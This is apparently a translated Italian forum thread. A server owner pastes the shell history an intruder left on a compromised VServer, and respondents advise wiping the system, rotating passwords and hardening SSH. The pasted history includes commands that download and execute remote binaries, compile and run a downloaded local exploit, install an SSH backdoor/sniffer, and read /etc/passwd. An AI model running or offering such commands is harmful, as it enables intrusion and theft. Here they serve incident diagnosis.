Trovato backdoor SSH su VServer. Cosa fare?

Ieri ho controllato la mia cronologia dei comandi sul mio VServer. Ho trovato diverse linee sospette.

  195  wget aridan.hol.es/sniffer.tgz
  196  tar xvf sniffer.tgz
  197  ls -a
  198  rm -rf sniffer.tgz
  199  rm -rf .sniff/
  200  cd /dev/shm
  201  ls -a
  202  mkdir " . "
  203  ls -a
  204  cd " . "/
  205  wget aridan.hol.es/sniffer.tgz
  206  tar xvf ar
  207  tar zxvf ar
  208  tar xvf sniffer.tgz
  209  cd .sniff/
  210  ls -a
  211  ./setup
  212  ls -a
  213  cd /var/tmp
  214  ls a-
  215  ls -a
  216  cd sy
  217  cd systemd-private-a5e12501dbc746eabcda29463d441b9e-openvpn\@server.servi                                                                             ce-HJ201p/
  218  ls -a
  219  pw
  220  pwd
  221  ls -a
  222  cd tmp/
  223  ls -a
  224  cd / .
  225  cd /dev/shm
  226  ls -a
  227  cd " . "/
  228  ls -a
  229  cd sniffer.tgz
  230  cd ..
  231  ls -a
  232  cd " . "/
  233  rm -rf sniffer.tgz
  234  cd .sniff/
  235  ls -a
  236  cd /var/tmp
  237  nproc
  238  w
  239  wget draqusor.hi2.ro/x; chmod +x *; ./x
  240  wget http://t1fix.com/local/ubuntu-2015.c; gcc ubuntu-2015.c -o ubuntu-20                                                                             15; chmod +x *; ./ubuntu-2015;
  241  id
  242  cd
  243  last
  244  cat /etc/passwd
  245  cd /dev/s
  246  cd /dev/shm/
  247  ls -a
  248  cd " . "/
  249  ls -a
  250  cd .sniff/
  251  ls -a
  252  nano se
  253  nano setup
  254  nano error_log
  255  nano error_log.2
  256  cat error_log.2
  257  ls -a
  258  nproc
  259  cd /var/tmp
  260  ls aรถ-
  261  ls -a
  262  rm -rf u*
  263  rm -rf x
  264  mkdir cache
  265  cd cache
  266  wget datafresh.org/md.tgz
  267  tat xvf md.tgz
  268  tar xvf md.tgz
  269  cd m
  270  cd d
  271  cd md
  272  ./a 5.196
  273  cat /proc/cpuinfo
  274  ./a 5.196
  275  ps -x
  276  cd /

Soprattutto lo sniffer.tgz mi ha scioccato. Ho installato una macchina virtuale e scaricato questo archivio tgz. Ho iniziato l'installazione e mi ha dato queste linee:

-----------------------------------------------------------------------------------
     #OLDTEAM SSHD BACKDOOR v1.2 - OpenSSH 3.6p1
                                  PRIVATE VERSION
-----------------------------------------------------------------------------------


 CHECKING THIS SYSTEM

# GCC:                   [ FOUND ]
# G++:                   [ FOUND ]
# MAKE:                  [ FOUND ]
# OPENSSL DEVEL:         [ NOT FOUND ]

NOW TRYING TO INSTALL OPENSSL DEVEL

Qualcuno sa come rimuoverlo?

Questo è ciò che dovresti fare su tutti i sistemi su cui hai avuto questo sniffer.tgz: Nuke Them From Orbit immediatamente e ricominciare da un'installazione pulita. (Cioè, distruggi i sistemi, reinstalla i dati puliti, carica i dati dai backup puliti , supponendo che tu abbia backup puliti, quindi indurisci i sistemi prima di rimetterli su Internet).

Ogni volta che hai malware o hacker che entrano nel tuo sistema in questo modo, è il momento di rianalizzare la configurazione del tuo sistema e assicurarti di non ripetere gli stessi passaggi con cui sono entrati. Ma poiché questo potrebbe non essere un sistema, hai la possibilità di prendere da parte e analizzare in modo forense, e poiché questo potrebbe essere il tuo unico server, è tempo di distruggere il sistema virtuale e ricominciare da zero (come ho detto sopra).

(E questo vale per qualsiasi situazione simile in cui si ottengono malware sul sistema. A meno che non si disponga di hardware di riserva per sostituire qualcosa del genere in modo da poter isolare ed esaminare in modo legale il sistema violato, che di solito la maggior parte degli utenti non ha, non si ha altra scelta nuke il sistema e ricominciare.)

Senza analizzare il tuo server non posso davvero dire cosa hai fatto di sbagliato, ma è probabile che questa backdoor sia più profonda nel sistema di un semplice "programma" che è stato installato. E, dal momento che i cattivi devono già installare una backdoor sul tuo sistema, puoi presumere che tutte le tue password siano state violate e non siano più sicure (sia che si tratti di SSH, di root MySQL o di qualsiasi altro tipo di password che abbia MAI stato inserito in questo sistema informatico). È ora di cambiare tutte le tue password!

Una volta eseguito il backup in un ambiente pulito, ecco alcuni suggerimenti di base su come procedere. Tieni presente che, poiché questi rendono un argomento molto più ampio, non posso davvero approfondire qui i dettagli, ma è sicuramente il momento di fare alcuni passi avanti per proteggere il tuo sistema:

1. Attiva un firewall e consenti solo l'accesso alle porte che devono essere aperte . ufwesiste per essere semplice, quindi usiamolo. sudo ufw enable. (Configurare ufwcorrettamente per il tuo ambiente è una storia diversa e che va oltre i confini di questa domanda.)

2. Limitare l'accesso a SSH remoto . Questo non è sempre fattibile, ma idealmente dovresti identificare gli indirizzi IP di tua proprietà e specificarli nella lista bianca nel firewall. (Se si utilizza un indirizzo IP residenziale dinamico, saltare questo passaggio).

3. Blocca l'accesso SSH al tuo server e richiedi l'uso delle chiavi SSH solo per l'autenticazione . In questo modo gli hacker non possono attaccare il tuo server e provare a indovinare le password. È molto MOLTO più difficile indovinare la chiave privata corretta (perché dovresti rinforzare tutti) e questo aiuta a proteggere dagli attacchi di forza bruta.

4. Se stai gestendo un sito Web, assicurati di bloccare le autorizzazioni in modo che le persone non possano caricare / eseguire cose a loro piacimento . Fare questo varia da sito a sito, quindi non posso darti ulteriori indicazioni qui (è impossibile farlo).

5. Inoltre, se gestisci un sito Web utilizzando Joomla o Wordpress o simili, assicurati di mantenere l'ambiente aggiornato e patchato con le vulnerabilità di sicurezza dei fornitori di software .

6. Laddove possibile, imposta, configura e usa i metodi di autenticazione a due fattori (2FA) per le cose con cui esegui l'autenticazione . Esistono molte soluzioni per l'autenticazione di secondo fattore per diverse applicazioni e la protezione di varie applicazioni in questo modo va oltre lo scopo di questo post, quindi dovresti fare le tue ricerche su questo punto prima di scegliere una soluzione.

7. Se devi assolutamente usare le password nella tua configurazione, usa un discreto gestore di password (quelle basate sul cloud non sono necessariamente buone scelte) e usa password lunghe, lunghe (25+ caratteri), casuali, non memorabili, diverse per ogni singolo oggetto protetto da password (da qui la raccomandazione per il gestore delle password). (Tuttavia, dovresti prendere in seria considerazione di NON utilizzare le password laddove possibile (come per l'autenticazione SSH) e utilizzare 2FA dove possibile).

Se c'è una backdoor ce ne sono altre 3. Isolare, eseguire il backup dei dati, modificarlo e ripristinare con cura i dati. Prestare attenzione ai dati di cron, php o mysql, tutti potrebbero essere compromessi. Ricorda a questo punto che hanno tutte le tue password e hash, quindi se altre macchine configurate in modo simile probabilmente hanno hackerato anche quelle ... La parte difficile è capire come sono arrivati ​​all'inizio. Se hai WordPress alla ricerca di malware in plugin / temi ecc ... Controlla le tue autorizzazioni, potresti avere 777 ovunque. Nessuna risposta semplice, stai guardando molto lavoro.